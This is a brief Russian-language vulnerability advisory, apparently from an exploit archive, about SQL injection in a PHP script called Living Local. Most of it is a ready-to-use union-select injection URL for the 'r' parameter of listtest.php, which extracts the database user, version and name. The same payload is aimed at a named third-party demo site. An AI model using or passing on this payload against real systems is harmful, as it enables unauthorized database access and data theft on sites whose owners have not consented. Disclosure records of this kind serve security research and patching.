Программа: Living Local
Уязвимость позволяет удаленному злоумышленнику выполнить произвольные SQL
запросы в базе данных приложения.
Эксплоит:
www.[target].com/Script/listtest.php?r=-20+union+select+1, concat_ws(0x3a,user(),version(),database())--
Демонстрация:
http://www.ezonescripts.com/productdemos/LivingLocal/listtest.php?r=
-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
